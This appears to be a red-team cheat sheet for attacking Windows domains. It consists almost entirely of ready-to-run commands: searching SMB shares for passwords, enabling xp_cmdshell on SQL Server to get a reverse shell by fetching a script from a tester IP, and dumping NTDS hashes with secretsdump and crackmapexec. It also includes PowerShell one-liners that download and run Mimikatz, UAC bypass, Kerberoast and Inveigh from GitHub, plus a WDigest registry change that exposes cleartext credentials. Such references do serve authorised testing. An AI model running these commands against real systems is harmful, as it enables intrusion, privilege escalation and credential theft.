Powerview Find-InterestingFile
Plunder http://joshstone.us/plunder/
CrackMapExec
Note: I strongly recommend that you comment out lines 62 and 63 in /usr/bin/smbmap before running this. Otherwise you'll have many screens of rotating status "/" in your log file.
smbmap -d [domain] -u [username] -p [password or NTLM hash] -R [share] -H [server] --depth 5 -g | tee shares.log
Search log file for credentials:
cat shares.log | grep -i --include \*.txt --include \*.doc --include \*.xls --include \*.xlsx -e passw -e unattend.xml -e secret -e accounts -e login
apt-get install -y cifs-utils
mount -t cifs -o ro,domain=[domain],username=[username],password=[password],sec=ntlmv2 //hostnameOrIP/Share /path/to/localdir
-OR-
mount.cifs //172.16.42.52/C /root/share -o username=<user>
grep -irn --include \*.txt --include \*.doc --include \*.xls --include \*.xlsx passw
Search file names:
find . -iname "*passw*" | grep -e '\.txt$' -e '\.xlsx$' -e '\.xls$' -e '\.doc$'
smbclient --pw-nt-hash -W [domain] -U [username]%[NT Hash] //[IP or hostname]/[share]
Lauch a cmd prompt as another user:
runas /netonly /user:[Domain]\[username] cmd.exe
Start PowerShell:
powershell -nop -exec bypass
Import-Module [full path to PowerView.ps1]
Verify you have authenticated access:
Get-NetDomainControllers
Run Invoke-ShareFinder:
Invoke-ShareFinder -Verbose -HostList [./hostlist.txt] -ExcludeStandard -CheckShareAccess | Out-File -Encoding ASCII Found-Shares.txt
findstr /s /n /i /p password \\example.com\sysvol\example.com\*
Invoke-FileFinder [Optional: -ShareList shares.txt] -Terms [comma seperated terms] -OutFile interesting_files.csv
In addition to RDP'ing into a host to run MS database tools, you can use DBVisualizer (free) over sshuttle, Metasploit, and SQShell.
Lauch a cmd prompt as another user:
runas /netonly /user:[Domain]\[username] cmd.exe
Start PowerShell:
powershell -nop -exec bypass
Import-Module [full path to PowerUpSQL.psd1]
Verify you have authenticated access:
Get-NetDomainControllers
Get-SQLInstanceDomain -Verbose
Invoke-SQLDumpInfo -Verbose -Instance "SQLServer1\STANDARDDEV2014"
... review output csv files.
Invoke-SQLAudit -Verbose -Instance "SQLServer1\STANDARDDEV2014"
$Servers = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose –Threads 10 | Where-Object {$_.Status –eq “Accessible”}
$Servers | Get-SQLServerInfo –Verbose
$Servers | Invoke-SQLAudit -Verbose
SQShell: http://joshstone.us/sqshell/
sqsh connect:
sqsh -S [Server IP] -U sa -P [password]
Execute commands:
xp_cmdshell 'whoami'
go
Enable xp_cmdshell:
EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go
Rotten Potato
xp_cmdshell "whoami /priv"
Look for "SeImpersonatePrivilege
Get a reverse shell (Use Nishang Invoke-PowerShellTcp.ps1):
xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://[PTK IP]/[port]/[scriptname.ps1]')"
go
/opt/impacket/examples/secretsdump.py [Domain]/[username]@[DC FQDN] | tee /path/to/outputfile
-OR-
crackmapexec smb [IP] -u [username] -p [password] --ntds drsuapi
Output log of cme will be in /root/.cme/logs
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y –Proxy Y -LogOutput Y -FileOutput Y"
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
findstr /S cpassword $env:logonserver\sysvol*.xml findstr /S cpassword %logonserver%\sysvol*.xml (cmd.exe)
Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1